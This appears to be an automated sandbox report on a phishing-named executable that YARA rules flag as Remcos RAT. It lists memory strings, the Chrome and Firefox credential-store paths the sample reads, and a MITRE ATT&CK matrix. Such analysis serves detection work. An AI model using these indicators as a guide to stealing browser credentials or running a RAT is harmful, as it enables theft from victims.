            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeQueries volume information: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00402832 Sleep,GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_00402832
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040E549 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,13_2_0040E549
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7948, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 8008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 7240, type: MEMORYSTR
            Contains functionality to steal Chrome passwords or cookies
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data13_2_00405622
            Contains functionality to steal Firefox passwords or cookies
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\13_2_004057B6
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: \key3.db13_2_004057B6

            Remote Access Functionality

            barindex
            Detected Remcos RAT
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_Inj
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_Inj
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
            Source: JXHPwNYzysUjKo.exe, 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_Inj
            Source: JXHPwNYzysUjKo.exe, 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
            Source: JXHPwNYzysUjKo.exe, 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_Inj
            Source: JXHPwNYzysUjKo.exe, 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
            Source: JXHPwNYzysUjKo.exeString found in binary or memory: Remcos_Mutex_Inj
            Source: JXHPwNYzysUjKo.exe, 0000000D.00000002.1424275604.0000000000AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_InjO
            Source: JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_Inj
            Source: JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
            Yara detected Remcos RAT
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7948, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 8008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 7240, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: cmd.exe13_2_0040E8B9

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		11
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		1
            Scheduled Task/Job            		1
            Access Token Manipulation            		1
            Deobfuscate/Decode Files or Information            		311
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Screen Capture            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		Logon Script (Windows)212
            Process Injection            		41
            Obfuscated Files or Information            		2
            Credentials In Files            		3
            File and Directory Discovery            		SMB/Windows Admin Shares311
            Input Capture            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Scheduled Task/Job            		12
            Software Packing            		NTDS33
            System Information Discovery            		Distributed Component Object Model3
            Clipboard Data            		1
            Remote Access Software            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets21
            Security Software Discovery            		SSHKeylogging1
